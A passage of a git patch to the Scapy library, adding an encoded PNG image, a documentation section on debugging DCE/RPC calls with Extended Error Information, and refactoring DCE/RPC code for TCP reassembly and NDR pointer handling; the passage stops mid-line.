z2nZ?-(k&9w-Q6fDN;e`%=g=iecf-&vLkLI?@!d1{?04_u-S3W%KRga`z*%e7y4QVO z*LnWV3#t)Z{SZ@7X%~Kyi`gJhEEPUmz)wQzo{+4Gw(P@CPbTN)lKN*yO}Xf;X)~An zuC(3ZM2F7iy1Vl#e8w4-L)|G&sQY20{-NvD`Un&Tn9ZhBL^lrdc&K}iM)S33WQYfc z+huLJgtSp(mb6MxOuZXf{h=XUW=Z&6OTK#&Ijjv~#7A^K|8tKc&z7awkDP}#JHoDL zh}py70Km?C{twhu>rZQNOiIc2Ngh$j*ck z8C?qRmxa}5aUG$Ei%&w_@88S0&xYSm$(W~_iugi-TSb8z37{+lhyd(BiMq+G|#-ld3~`sKNsJW~Zt zV}e1;tsUZzj)8-w!g$cAP8dST(;611tjNVhE>wo_iLu-uCnzogVTrF)+e=H?QD3Q< zU0GVdZ5)6&k^g#Q+#fH|d8NVG4-5tqt>6Lej5ugWPl-OdB1xItBC&+B7X6OcE9f52 z&(>J5uN6cLZf!pYdKm28$OMOJZWcX4Sws95ZcyscgHuy7kYG#s+LB#b|o1k zqhbg8P~H}y|1GCkg-Q05wo*9=&xF4lDDD-MK#PXaxgY;B5bdX1tNULo=+rUuqsG-F z0x|N#*{P{_NCv{JYfi$rOLjzFo`MSC#52BoZ57$RR1GqSdOV5#=CDCnnvnyG_}>fo z-V~lT1q+%w<$oyB7&6v=85W-8{Cb8?exZsy zRRU}Sx<-+R3_?XJV4)#1wDWv332Zf9z-y36x)|}=k3$r$t>Z2^WeNh*uX(d>3*u@|GoBh zw3rC*lX|R+Q(psX$xh0+p6FWbjuA@(n^ns{=lwhvgqHx__e5ne=_Q9PEh2s>*?k+o zgc4wyXDn9Zmb3e?t( z;I0Lok|KJHs6LVE6cYs znaH9=+^<}jA^xR{-<6+VT1Xc`*?)L%_B_b4lbPgM`Zd#G6IT-8wl*i+yhquN!W{?R z1BtD~hf~{k2-yJ!X6X<+!d-!wMwSi!nu`1O-USsmZe6Hk&K0{Z2Kby1;vttS3*2AU zoMHmk|HTXX-`ZBVQV0(h-H0(Re?zVg5h_q1MskMZ&NchP52z+Q;Ze0)xA?9ea8U?% z!oN|1p!Q<|aRAV>W@yR3;Q%h>D6N{fQT51-Hf3L92b#_OX63BlASQE4rKCqtK`Q(( z+S0_H9SyiNa3qBq4P_-{v_uHy0iUfypuz*J)!CP?;7jXrG|Fl+!n!$zcBYZ7?8{bq zKq9M5YUfyVC+&y#Lfp}IOcnCF#^w9tCi$1W^4|*;lfJL+e8X)fqq#RFw%!HRBE9Ny zTjp9RE8JK_0PEh0J0m*S#$Irq=&*ab85lt=c?5}1$Obnhzn=r0?d`K{AiGt{>aRwC z=~RW)$O{{Kcz{%svni<^X)q4?0?LuD^SfNETkpAPwa32To80cmi>1(h*Cuj-ZCWjn z_Wh@}i}lbK+pEjfjEW{8is-9NXuJ2jevg(LXZ`s;zeG`{6kbPy@pfL`H3B#O0XB4g zfur;@0sIaXK5)tg{7b*+-{elk{74^eP&IadY5~5fj$QDxAdtsxyo^#2-Q)Vmd-}V( zS_N(X;VRc;8)a(V$fC@sjGDeh8FNt0RDnh{uxSZ!1ZPvmd5WB3O6b7KDjtm2bU5C0 z?GE&Pek&#G*kDSVda^YbAI-;WZgR%+Xof%xIqJ@)GM^om7on^wJa)cX)qu&>Vyfc0 zfb;hE6zAEuUr3)e?$%{88YgBlKEHnpxum&;nyv#R8U@&6f=th%dT`yY2mAn=lsf8j z_LogIcq5mC^d>{E)jaR!p%7^qJ!-W237`+-~x9{oIm% zh6W_61ZL!(4J9YSMQFJC;Xl+x&VLWv!r8Xl7R?*qV&+5&?qR2T9%>-0xe+b-z|r>% zy9FiI6g@ZZ-Q3yglhw6UaJvbD`{A=ldu-O`+4c2HXcAEN(FBk-UlU6jet}&GA4S8C z#M1G8xr(Q6s3_rC2}v)^<`3P2}?9iS$@qWngYy)mKRnKVg%^zln3 z>LUwOg$7JuECq+lMc+lhRygd=l5)60+)QSPKGh?t40WE~MEx{oj|o0;?e?gA?JsY? znxfpupj9i5<{miEy@#CFyZj6&*V!CpvG2=Vab6iS%wGE2XaTQoAYR9GNc z&u3MH|GeaSCT{Ly2CX4KIe6)*Vyt>@)dS#|&0^VO*H{t8REu>UI{jvp+wb0oTqI5J zmjZXgKiX9bk5mi~t=`JFT>JGmyDH6-zJ{zNjmAi3cjO|sF40B>6pfz8vJQf~x16>w z-q)P{JkfO!9QL=A-+BtC){}rOdAGIo3Y2a~=lp`=%4e>9QUmq~d84J)bKdE-5Bx6IKiOZcMgVO1Pl}DUqITGCs)?QSXS0%s-69w8;N1TCpFi?S zx}W%$esVN^ox`<%)F7LyjV(9;eeVf}ECdg4LXqb-=+^(Api+@8hz$5VUS<3Y>`>tu z=OMF&e{fl_7fwb)X^32ip0WE=leGRfHA!k8s7Va(=CnXv1XtOYhjw1`S+#`O_qEhW zD}*BcMDM&CY$OK1_C!h$Z#PsrqlG-9F>*(XXCYg-~{I^cabQfhGMwR4Say z3vAL9W}Cjz7QeND$Fzs0qcl-QxV-+A6qr;WxlC=ay=E+z7AmqFg78ywqTDaEG(JK) zj|W|@tO8;o7c#%{@+vMd6_@6oG(R@d6nYLPdj++W7zb8U<-Nl~gd>(x`my zNEbnn7gpV;_5M`h&aD@8{?wzNW@WtWUo%SEBmhw#_0tsH;H#3w+(r{f1!Y!lyZO8o zEH_90+_tKHz+1`0CPHg&wh%b070z3mvS?OzGFH_XXzjJ1WVdH)tH0&(@sCL}76^u2 zUtGu3Ne(e>#slun6LojdmpTH}`zzlc0a0-o#Tmo<5Yt~*Rj0ymdz4)Mb7q{Ow;1mp zrss*>Fjc{LN1Oie8hB&|wiRPqvy4fcna-{gx8V6$zRm^a06zaD1!E2-gDnh7#$Y$h z8G5pAB*P0|FJi{ibA32YHeSny09ratRwCEV;^|p!R4W9)U4Ua5kN7|TZ?qg!ocajI zN1iLUYA;g?N4>H_ka2veCEzL;OGg%ba(tbO@b3P0_^T#Tf=2zkJ_>WD;t@o#I;gG; zmD9!=qphzXP8wrtMwj0Et>t8Bv{+O?g^T#qXpvNh{{xk3fr@GYmh)B4>^~k=3<3$2 z4*m>90@+gn!^n2D$YPAq7hA65k6QR8{?_w1wl)D~0vaxu<0A=2*04Fnj-SAWg1&^tqquhhQj~R@jTkFfO1f>a9=7<)(JU z&Fq8}i6}FpOPCNP^0PqwWLF#cnSFV?9{-py&YydWU0P2a=g{spJ@tkSOmAGh_fA8l ziI2~I>+jW^v*z%vaC+sPu3uZqi2>Hd_@7CP3}`6yr^cFNss`J!lcxkrvg&1Ktg+50 z!`44rzdUIEAnUmv;|8wMKYTKtAbRU-tD0%bd_kJzHmnW_i7yH2Z!bz^w4917&Iql5@3e~b2Nzv4Qb_E$uIPAD z6>*74NLce4Yh>JBlIkA@j5DYf?x5$GOsNYD zo1S{qwAj+(??Xf0mE7kn%PQ_S7{Lb8WgN5#+kTEPHSGPAQi;H7u47z5;$gapEv;XB zT>8UHe6$nSZ`hoFP>DBphroc~FD)oLdu(I@2 zFxOvLu7TPQZ(WY}X4cDvJZjP7U_zM>9@zWJ!g}YOPB$OKzDRyV|ET#?Ham80Xmdqd zgFzwTMz@VHZRXRi)1%z)E0m?%mt%y4(VUSsiKT%dk||=sdBOP9Jnq9rd&@7|YPm0e z=A=bHRnG)&>+Q>8XUIxI-VW1mPS+4Q&$=?aQc3#QGeQ4dcUpN@=$@NUZ5&``+AvY& z*J4qhT)feS7eARiRI3L1xkXwGeR(z)1^u6+@jl zsX@wpiI@~G%)0BC<{PL!s;L=jNl^%-ZauAs<3c~E0iqVhfN}j4y~exkyC_HmT;hit z6jDW&SIrGF&3`bCo<8pVw~E1ol>+cCmf{6JtLr{dA6^lZgBG+#rFbD*v$ziswdxS? z8EDSuxY1~L$}JC8>%!TByD0^YUZHM!{I_`@v&0L z8j?5>yOTy3Vs|oz*qs?6m(%r??piHfV?o2RT5onwJ8 zX$lDi6xn3m{)psd4MQ0Rha~%Y)feB0A?h(HtIPU=~-^kZ{xkB7#5W`ej^At752t&{`$%T zY>g^Xp+?aCBk5i5dS$gRFqUj|9&%UUrYcPUZ>{nbF+<($&Hm`0({mls@%$IaTK6sN zzt~a7gY|<l0_617u+^cpYI= zAbu980FRc-R~WkXQj_}*OZupv_JhK8SCH!BK>S`a2sLM5Y6!#oE1#@V5HKhX+~m}i zc{Vs;@iV%zOb+tV?3r|2>UN4>S4(Q+b89NI8@-w3N<>F{C*aDIXH3YWnGQW#(@CxlDK2Qf{j9;#TzaGh?_iXy& zW`1P}Fm8wl%1(ifO_7CuO` zvLAuxF<2{z|G(fxy}5+uH=%RDp4D9=?6I9q?1qYXVyv>J+^}$?@NS)3PDUQ;Gei8% z>Nqj3dGQGs`r9-WrALmh9xi9`FA9~s#Obw<6P0Lv&MLbwHP_!f<|=#KaS&s(bw-^C zr$cQ0$Z$4&DUW`u&BvFYakymr^4^K_Bsp#!s{1w6)bpK>7b~vMlQcA*%yc^|hUG{Zj(WIo;5{gcBA0C%@R@&h0z>{MV*i&@^9^2fK>V?@Fe7`6sf?y`@0XumTo_DR2DmXr)qxl#hqrr zDgelWCEp{}rCMCGlML}03_8y{#@}CdQTm-2+zdn_j^_u>nUS3nfPHi_ye$>&$dAb5}7fHOd}-(u70V+JmH=@hpFh{ z`A?o?_~hGWsE`lJJnFBOn2K-)@0WdeD5iRsSRcLDQ2F@iRMF(cnLeac{_29_+!hbd zLCx-z8^LS*K(Tzfav+8anLbwTkg5bsRhtfT&vRUq+`NtIt%_l})~%*$^7lm-O$1_~ zfmQ*5yk6@|sa}c@NYBel&{I*#-7w6B=j8v2(tvVJR~u1Y^bf|_c0P!U{|e&PIlUQZ z$-;s4fQDi6*Bm<-k*>|U@BCP34MxQ*`5_IYD6{>Zw|VQ?VvbSq?@7?7bN7|xEv7W( z?7nL6u0caKphN{fNaT=?W`k^vsN6fIIAoJyqE)vFQK`S_Xxil#;^yXxmMiMy;$|}C z9sthbKw01beIfzZwGN0`#Vb>&nB_Ic8Pwz7IOhro_7sJLQ8(EZW)2@W3O#LUgs)|sMdM7*{qlaShocYTc>oJD#FVQB zBqrRz(LdR_OE}n32mWG-`Y4#-4x;oL#Ls=0o;%h5FE~y8dlp~sR36Z9S@+x=3b(Y7 z%x%0qt4;@cT*mr?#5WPovNtz(Epg0R(m+YH8l{)sLQw@p3qruyf>zkAxXfb;bvK}ACwePoqO;js`C(AWOW`k4}B}*FrB=gl6|aMPvU+-Z;f1V zujmi|%4x@xen)ocnPm=P^UtRiNFspSV^Sn|@hM89(s2?qK?g~Fb}eBQW-@qay}W-A z4n~FREhZq8rpjmw2M*9M5w@gO*pPKO%_qWA6BQ(yds^+MLrJoc}Ayrs?MXr zE7wNf&P2U%p0zSs=6;9WAoWD~*#$rH{=-C+Uw}ONe;MX7acdsk<0;uk*#C=<>M<4X zgl5qsianh2adFJP?cjC=d@@L#^bt=8%?KD=;zO^mRL`nnZZ*)usItFDaVXv{yMv~9 zR#b3HS(x@8Pt8A{CZ-BGfN5e-&zGymA3n|Im{>emyOG&r6kdvVmcJO-4GVST`P9ttxu>=<@Fvt+| z$29J`)r%4bzM)n{d+VGbIlLRr#5dcfUnj@6M{-~4WTBe6O#M)V7EYd?VKpqeLH>MJ ztRwB2tEa?r^;{6jfABO_M?OupjBh;v7>90zN-r&;a(u5(U9bA)!4)^~_d?~=u_4Gc z5mk3D8e3u?3Vuo8NO-UQ@w<=EM$Caemq6VyLqIytE51kbii2qfLSeOgcM zuJ(UN9!&jme`dX~!k(+WvT0)mBKToSVS($F;Y7)RmlyDQlwet2pTUGa0L5c|J*&K)!GkL!4-D}KooF7)~>Cz&}g7*zAl~duf zO5XR#9BU-~d2<3cp%43Q%`Cf*CM#wI>;zW!V@GXtB0M6Fw2F9$pAX!PCMFa?pT86R zxjwuNO+{s&)wqe%F)A6QvO&15nivtpy=Ietq@Q!P)tJoSv74#YD-|-v^<( zmz3s2H2aq;JcQTK#Vk+1M4^a@X_c>bFLRf@dn0k2?RI8t+@R|%VVWd=Cvyx%LM{z0u?(dlUq@T(Az_M6@eUUEj=4i#zr%< zw{Lkh%}wiZygu7@@J!hzubN}AtcdQ{^M!Xh%h(A48Rm&cUFF;g|MM-=8yXwE_xUSE zx2Abh@T(lp?^5o#!`bQSyyA9N(S#7E-i$F~ShH`1zvD!w^W^tZhjY_UXxWju$r;@I z%)N(df?eFZFhVdO)>H->3HMKEI&>9$I^Cq#$C+p;mD28CyJdI!c+y+M4^$AT{9z-k zH>#+Qu&~_DF_n#ZZ_e{aB$_|=;Tgu>qkDZby6b?f*0-KRPLJ)_(RtN_h{O~!GN0!I zA$E{a#Ta3dmw5Xy_dIq#I)7Vx>v<(ehx**#Zm@9pPB=#ml|NhK9;1M%#X4`2KiuuWB;LI#XfDOR9?gFm zGOpntBt5{0PR3TcM#>8HcEq*OV+$~qD6OlYZg){TcBJSsf2`2HKbyr)inzIcT_ObUc;J>lWc2IlZpJ zW)K^Hde^NuG>!(KC17!o)&Goqj5r&3_*KBY)a6aXPi?^J|&wE|ir&vF+8b__sqkL;*4zo!k zzv|NFQX2vzwBctToo#!5QGX%1Dm%WS)+l@PRushBR5TOV5Of5RD1BqoQa%r5Esh37 z&Dkv|tjChdK8s6ca%#)8+q=n#H{U*C%aN)_9kn2S!I!~BWf)=qltG<*X$_@3O(ZsiKnkl?Cij)?7;6F8c>*Xk-2a9zASco zj4b0~OWw{Yvwrz{((*IKkM%LUl>81IJfXv|;wDyI?{ml9Df40@*~K?91Hbe2&R==} zuLjS46JiAfs~h+JCbUZavl3IZ4E>L8wkE;m7s+lvJndIQz-2#b*^RzB%}_CF`I_|J z>Rod89U^=EPG(4`(Q0k%oot8R$wG#BqF&Z;GXA)a_z=qg$n|tFYcfz5`}=jyHZ! zd92Hh(w?$>*p=DE`_RpOC&`fSP}g>jBF9{y=P1=9wY{`Oeo=x>KJ`(Mju5vA|pfh8OsYeJ3u; z<J1gbGUBXs?n2g>KLpojz_3X?mg=wnn9MU zXufgtweZz@R$$&cU`V+Eb!?OqWZ8-O4{m7BH-%*?(OX7;zA0@$>n$S|cGnQzgI5*US#}$htY8B6v3~UtyS`OBrMPSn z?8(E(6_-+(MJ@`WC5vMJwFvnvwKPV3ChXMOuvYo}4gVV}fLw72*S!hX0%hL}G8xkGnQnLZW&!)c_XiMcY9F96avIM%js zOCqM@$$gJEK%VpOJCX7woyS9CK?HznRC&-xL&_-<`@AKi>UN6Z2Dey(IYYpOwl8~| zcMoMZqs?{>yU7pASd%+dOKRgNdUZY6=Bo2}_J+pLi&S0(9u0giNS0$@ELceOT9Zi% zV@)`{1I>BNn`%FGGFiiM9#8O>b&(z}UCdJ+I}|tb^w@ZBk5$&!X|MGcHYOVtXm_oB zQYmWQf1=)6(nQ#B1mZQqUp(d7z3g8yz2A3f>gD)(kjIde5_QI<6-D(380(h+yXIre zK8W+f#_&N2Kp|Fv0?AWeqvM0FHE$AMjku}UalGZ7z-*%M!{*vKkDSTtpO1ul_T3it zPk#NBA78q@*{<9x5^Yany*L_T$=rSO$ygh?R*)=f>v##HIrMwJ_4hIo&fmXPo7V>u zUAVVv*dj%BbtKH%y67>%2{T;|1YvH@rtBM?3O2O7#+ihp_B3&B&_9 z&FH9vc1!Pz=ieQ_`9h-V@!2IDyVvyM*Ls~Ae{c1Ht&-!o4lR09b-or!-c;VXm)e)` zc9UBA` z!*4rmHV4K#;^CmAZhJhzW4dGU4k3Fo#!Ks{cb`x)(L%V18>-mV1ZE%rT}vspb?k?P z;J87jkE$?Pigwn^aL28zN|OB-VN}>_P7_B5_r_kpH@+RP>ENlTWI$F^zI(cCO4Inx zR3C6OU_n-$Lymr5GqmCNKR=rDC9xL{w_m{peH?fuugd&O?O3BdLX$}4}&n|%-3EFahy}+ZkQNS45-oRk{K%8JzY_(ZwcG!aholq$&VIi=2O zUCqPK^ETKUPRmkXl`YmrA__cb9&L3;*2R)q)=xu>-sptFm6-0wyr@6h>vpMGc+J4V7`s+E+fFmnCs)^@j^mdFJ4#zkr(i=mH32uBHF55fq(qHl3>8P z_wSeFIHxzh6V#%IqouYS-{R8T*+PwDKr}WBwfSY`z^3#;q|o8ri^Hm>h5G%zRtDkS z>#p{*YiV81`-Qsm_;c11t5Cn`j^GO&JD$o zLgTs5Dza5Bho!-eQwMLyaR_E@b3zne1tIDTq29Gx+xnut)l+F%0*3QrB$8RWCJ(3P z1$&+(bkx@|kG_j#<@5I!gY~_>iRBbu*jGrY0Y7#1g_FJDw1GpCe6`qy8Ej9vgms$m zkh6A(g; zR{8E*n)rF`EG0uQsRxedGU(xo)>CYa`@+n&DWXpwQ__)&AoBgL?g4KoWejdWi0@~*)_K?qj>&v-uJK_H|w&qWhbod z*yH@mhboMu9&Z^5<(TXORe5FQoE2*F@+ePg$ms$3jArr41#^vM%?8ui-JZ*WL_ehz z*F%%HhQI|F+&Z8GtE=Zv8W`aVsWmq*FAj~pE<3g#`>91U0zMXshqy`Cd-}raFiSG0F=AhghuE(>h!+9Hg zW4wm@e$jzuUueNVt)+HEuccMgqncGxCL7k6 z!dmnwulw9;g*i}UHk{aJqK!8X2AtBWpQFUgZ%pqnke^KRZ8D5=V@`vLf~sI|Oo)KB zUFo?%1i&8E0zV}wzz#0>_^F||{MY*TfyeK-gE++<+Dj(h!3I|@d*Vg#z#4>^Wh5Nf zQjrx^!;PuThEw1!O0kOB$pkI{|CIsEoF#{sE9nrZT%lm|7Nx zdZ^j`C>aC?gOSmT(uvN73Wq~;D!K*ihgR6UN$==5L?xR zYCD5nkk3_n3EiGO#?n@%Ze2{PFnrOvWXH|*d9(lZE3V*ySZ*|^y1qz6*D8UgK-;1% z0bxoyvZC!FVW-#^SYF~u6Jyn|XCdY<7RU2{8_c>kP4;Z$y@%tShyBy{NHKai{REF* zq`EUR>#R8>%e_U5v$p!=yWPG*QA0TwHJAU-y%%^h&V}0JymzYh^|>c%u`;8aD6nqo z|3rU7`hhvXD1KkvPy|n-|(8&qs~bcLQ!|cD*}~Wwh6nJF*8{DKQ^2 z1cKzykpc?60$#39%o_K-57ITBnVT~^ZBK^^Y*(Y@ z<%tXz<`umsxQ5Uh827{*j5S$Ia!kAL0M9Prps5|;kRy;?c4fGilv&@vj_0lDTcuRE zU(l(hKpPL=*f8_> zokh((93t5TT7IFiv9~>r>gN9L=NB>>R2eOV;S^%z?t1OGd_F6j|5U5->1fV7t%aHL z3HAB9)FfP9qE*6+gc>)T$jFO`4ClWZ*qMe+1yRe?Qd|z27l`p2Z!hl^__Fuz5}KX2tsadiy*_mgYmUsEB-pKq~KylSi-L|MJE6 z5Y@ZgQnMn?Oo6vlIj-B<0)m)UhOwQwGZsIN@1DYnmk!2r7Hci@e@$LGN)-7arW{Cz z*uPC{UM8~O2$H(W?XYYpU*Bc)$By0Ws$e5U{dNQEmP^-GXvUXJ(hMF{_DuX0ID%o7 z9Cw$D6JIL~?>aDdR4g-xk8Xy#Gh%bXQ(!s1joxtmM0Up<~LzJ!+yD^v))<2B5=>< z$3y7eCdt(2>{=#HLm;UW_!I>`gPFEm#z9vg|s^C8s)F+n%G20?^jcg6| zu&~1E&DkHzY&{iLM+$APC*K@JG^2K%5@Jjcv3s9<*@WNT7_6Dm&ha5)ocaQH$dP=+Gp>J^cc;}8 z91Z#2sk{d@iVv_C*e`rD3S(mkLpoo&z13g5sye>=9cX2YcC$tpat7DiVX8L|L0o~H z$oWtCU4YNklcS<%k|0kcG%LS&F!X+koABPW`h?9x+Dt;Q7tp7iy$hzW*Lv5*CQN#Y z(+^fhM$qSXNA4NJW(K_@jU`hiF4TdyQ2&b*%gXY(@jFw@5`504X)B$fDaDbm@y5;2Y!IQI31hykRw z?)hM#P3Ft|ES3P){YXb3xdBOd!yCGQBuf6Q?9jZhKNKo_b9)O9WagE1fnBHh(@J)w zFSw>QXU^*Q*Lv6%ft&`C@n||1LxDt8%Y=cy{4gcotIDv`wox0_ts+TJEloe;WmyP2 zJblK2n0)3|fac9G;(&SNyF`ynni_ja5K(-=_RPKgL(@K{U0bQ_%hu9|?0nJvb;Clh zZWLdnPJp1i-!(RMhi)@%yXHhSVa>LDI#2Sow<=eeem4rS0|;Pdz1Ln$+Wh5t(w>S99%A3qZ&?~ntVw{gO^?Ie&rS}Tg zOJd_UTPL6>rC*k^BCM3x3}X{G5vRFYJ{uzO(BtnDK0jutEaZNdiU;|U-q>rr2%%nROev#=a*~GpvXieN% zTyYw$0tXD?yQ-N}b7A3oais`Ra@XVRD3Mpg)%*CD zzwnPw`n@A6&Bv$wCV))`&wRY-N540q7J2M-LO3MEJFmvD#|jq@djHTuFR8v{;%W%# zwU*6^x#XnZ?8Or&zmb6tC$|h4Tvy`Qw7=l%-OPNr z{Frpe2V?NFNZk6aO9{bff`MNIoMlXOic&%uWH)&l3nX`|r|JE^M-Wa!mMbc#6nxJw z_x*Q8!Vua|l{;dvs;>XJDQF1&Aam8aP3?#QZFk8}8g?1@jWHU(zfkR*?)ob*WA0a$ z;3j|yy%8i&s%g`VnJyASIaZ7vkYslOKC=YzDXGQk>1DIx2l6dPTcMqF0R-Z^IEYh^ znB&F9gi216nk4&r!>hbwV%i0xmuB+zcnl{(KRIG&JJuZ>4a*7OI-l)X1vH-HmWSo# z5s1Z$c%KfZE%piQfEZYW^(t0SK7AJ!IUgr~);2v?X4Gv1bQX!QCXi2S-)}*Y@0&xr zfAn1;$??Mn0Efh7lqKUN>4tHoA^-pgQaS29lV6EPRG)2EK*JquikO$*ke|$z5`wjJ zUOHWPCqP8vBXyHN*n@Fhcb07+;n=T?23FEc0~=AfyYc$UtCNuhq&)tnWevZybaQq$ z5pZp*rgNuhFZfnb3-h2lvH4AtAlq92DkDAyi0rM>+lrMRs#ajWjvL`5Vn|*mLL$RG zcM_CfyyXj$6h+{Z{Wk5C&hfB4+V3&yyWzCJ927*l^R$dCMW|%T{OPyV{UC(E>XT_m z36|3%1AHKFT9FbtB}Bl=`4T|x!AF2kiA{J;T7L_dCSsPX8(dFF71Llm$n*}uv^d#Y zsorfPUwQMMHtot6YlrxUpa~Jf?MUxO49HiLAbhU4FFielyngvpcXT4fRINeao8i^U za(o!pjVE7{Ww>Z(J@#dj?Yfu{3Fd_1s8lpf=Kdj)+1k`9u38zzgQbmP?dp3ClI@Jv zk3=p{`UeLF^j*Uvn!(&6Oq#7>WIFBaG*rm_P#-o{hzOwQWMZ;g& z{INN%*~*-r`xf^rHMJ!8(j5_6vR=f=3)j^^wb0Yk`@5g*#pW$czNY@XC7+^%A0uDV zwdxtRZ-e_0?cJM+@cF;{NjsG87s(-Q>~tM0zjKm}bqb(`Fyy%u5Bz)O8B&xLVk+~8 z@*p8$cnuAiWd$lYqW}2-^>2XG)CT|;`t${Y-Dp0;@%^xw@#B7pceW5ha@_AS&uNfxwem3|vHrv!={QhTM zD=a8JdmZ-iRR)7m=v~NnDdFJp6V*aMlc;JTHIuF@y3!fJv$LqKa=UeV{L|u>PkkVY z&7pp){ro8yANMF#>GW|3Ku)Qra=TQ677#2u1+5`a9sMlgKOaG?%Uam@4H*CkI z+RqVmH?EnYvd)>?m~`dkH&ZErZx7VwpKdnGuEnL_r-&VcW>aYZ+M7YS6|_W8`n+7V z81fMcl6kqmsl^@20+tLBQ}7Z^=AZ%IHjIQoOpA;yx(aGpOumKstvSNvv&H2oce7^$ zK_(&H%zZd_9eTL9mu|!yAN7S{mMs&|&OM`u{%otqpg6NgE=nLk#qLtF3)+khnPbe> zQ9rK4Ek5f7&t^Bp>y7F=Y(aG!WPcGhEo5}DuO?fN5;uL1&dP^h1u9;{`zd>xu&tFX@R55 zrqhV)Mv13;%6^HGbZyS|pQ&=Ew0S=mIxp;^+g^IP>dY2bHsHBZ)=-yk)su!|?8p~Y z;X%Q8IUIHme`S=pr_tEWvu%5?qV=Z>&Vm#EPx6%FQbRWA1H`w!d2?&WN zk_?;&HHWtZwmAb$?Jc{f;Cr|Yu2&@`3jN|nyrN#Q>v>sGLS+pG;?pZLO0%zW$DWAbhYBCij9QIT zl~jpaw1VlHLX~HHgeAP#Ms|{?;bt&hq}GKJuk&3;#8#XN5KoR?f>{p6Q6CV`B5Dc2 z8i1Q^lBpXfwcyxZ;R#42e)lf)pN&_84#PSlHZcG5bKQ8>MXv)BH2yhv(+w zy$`*$$|5^~3W$xa?p!G-+0IiAr(qUBfCphz2Tpg>NaNhQf9|h*!Ow+Te@#)IaR2bV4M|ig^U@;AgVukK2dH>}5K%%RXM!pQ@`JTdaAJ*{k-54or;-@0xvIMoEyw%F(@%Q{lVuvN=rIvOt{X zJY?kO93#kaXjxC`r9*^UEv+C2UaXuC`xJBdzP<`1PCp^k$P&?7FMQ_NLG}hVefX0( zu&L%-#+uBUD&Al96^p2qXKa{;Ql0_e(l^{hB6j;ZuhaKDPC6s_5(Z&h_3@G<>zgJp4U ztY8JqY_sI_$06_7TW$qPttzs(i+e%47{_^6Y2E2Ogl|(>M9sW}fNGrP9o`C#s*DE1k1;ii6ZV36chiq# zLx*dp$v0zL8&-aw*u5lwexgXr8K6$>2jjn4E%@LEzEH{7 z9OW1b+|z+4O4OM5*L@bhQRBN#7IV4V1$h{=O2=zMD@6wN5+z{grZ zQ>}xK;-rRYkw$;Zf;Z)v`i7*l{ZOgXmD9CLdq z)s@_)QM%a5{n%srRboQ&yAVk_umn({@61JRIj+qoa#$X(JQ$w|u3njJk$xCwMBkg> z!u=ZBRo1n}wQDwQuSdZdM&nhO)(57Kh+_HCWP6O-m{(!H1)jgb#N1!#Q!kJs>LwM4^Ro@Xr zgcaS?EA=ydDd|(fW?#Gl)4cw7HEa2S@ChhR-An}=A9qm%|E>igJ z()l5IY|-C3zKQ+0weM&)c_5F!+)j`7DvEw@{@t&WH|0^l*NbOz5=CPAe*X_#@#d-k literal 0 HcmV?d00001 diff --git a/doc/scapy/layers/dcerpc.rst b/doc/scapy/layers/dcerpc.rst index 5b27a3f5ac5..aaac3af3429 100644 --- a/doc/scapy/layers/dcerpc.rst +++ b/doc/scapy/layers/dcerpc.rst @@ -395,6 +395,21 @@ To start an endpoint mapper (this should be a separate process from your RPC ser .. note:: Currently, a DCERPC_Server will let a client bind on all interfaces that Scapy has registered (imported). Supposedly though, you know which RPCs are going to be queried. +Debugging with extended error information (eerr) +------------------------------------------------ + +To debug a RPC call, you can enable the forwarding of Extended Error Information in ``Computer Configuration > Administrative Templates > System > Remote Procedure Call`` on the remote computer. + +.. image:: ../graphics/dcerpc/debug_eerr.png + :align: center + +Once this is done, load EERR in Scapy (in your script) as such: + +.. code:: python + + from scapy.layers.msrpce.mseerr import * + +To enable parsing of the extended error information. Those information will provide a more in-depth stack trace of errors, if available. Passive sniffing ---------------- diff --git a/scapy/layers/dcerpc.py b/scapy/layers/dcerpc.py index 8174d4ff354..0b89c7456b5 100644 --- a/scapy/layers/dcerpc.py +++ b/scapy/layers/dcerpc.py @@ -97,9 +97,11 @@ Kerberos, ) from scapy.layers.gssapi import ( - GSS_S_COMPLETE, - GSSAPI_BLOB_SIGNATURE, GSSAPI_BLOB, + GSSAPI_BLOB_SIGNATURE, + GSS_S_COMPLETE, + GSS_S_FLAGS, + GSS_C_FLAGS, SSP, ) from scapy.layers.inet import TCP @@ -212,6 +214,12 @@ def dispatch_hook(cls, _pkt=None, *args, **kargs): return DceRpc5 return DceRpc5 + @classmethod + def tcp_reassemble(cls, data, metadata, session): + if data[0:1] == b"\x05": + return DceRpc5.tcp_reassemble(data, metadata, session) + return DceRpc(data) + bind_bottom_up(TCP, DceRpc, sport=135) bind_layers(TCP, DceRpc, dport=135) @@ -1612,32 +1620,38 @@ class NDRFullPointerField(_FieldContainer): """ A NDR Full/Unique pointer field encapsulation. - :param deferred: This pointer is deferred. This means that it's representation - will not appear after the pointer. + :param EMBEDDED: This pointer is embedded. This means that it's representation + will not appear after the pointer (pointer deferral applies). See [C706] 14.3.12.3 - Algorithm for Deferral of Referents """ EMBEDDED = False + EMBEDDED_REF = False - def __init__(self, fld, deferred=False, fmt="I"): + def __init__(self, fld, ref=False, fmt="I"): self.fld = fld + self.ref = ref self.default = None - self.deferred = deferred def getfield(self, pkt, s): fmt = _e(pkt.ndrendian) + ["I", "Q"][pkt.ndr64] remain, referent_id = NDRAlign(Field("", 0, fmt=fmt), align=(4, 8)).getfield( pkt, s ) - if not self.EMBEDDED and referent_id == 0: + + # No value + if referent_id == 0 and not self.EMBEDDED_REF: return remain, None - if self.deferred: + + # With value + if self.EMBEDDED: # deferred ptr = NDRPointer( ndr64=pkt.ndr64, ndrendian=pkt.ndrendian, referent_id=referent_id ) pkt.deferred_pointers.append((ptr, partial(self.fld.getfield, pkt))) return remain, ptr + remain, val = self.fld.getfield(pkt, remain) return remain, NDRPointer( ndr64=pkt.ndr64, ndrendian=pkt.ndrendian, referent_id=referent_id, value=val @@ -1650,17 +1664,21 @@ def addfield(self, pkt, s, val): ) fmt = _e(pkt.ndrendian) + ["I", "Q"][pkt.ndr64] fld = NDRAlign(Field("", 0, fmt=fmt), align=(4, 8)) - if not self.EMBEDDED and val is None: + + # No value + if val is None and not self.EMBEDDED_REF: return fld.addfield(pkt, s, 0) - else: - _set_ctx_on(val.value, pkt) - s = fld.addfield(pkt, s, val.referent_id) - if self.deferred: + + # With value + _set_ctx_on(val.value, pkt) + s = fld.addfield(pkt, s, val.referent_id) + if self.EMBEDDED: # deferred pkt.deferred_pointers.append( ((lambda s: self.fld.addfield(pkt, s, val.value)), val) ) return s + return self.fld.addfield(pkt, s, val.value) def any2i(self, pkt, x): @@ -1693,12 +1711,25 @@ def valueof(self, pkt, x): return self.fld.valueof(pkt, x.value) +class 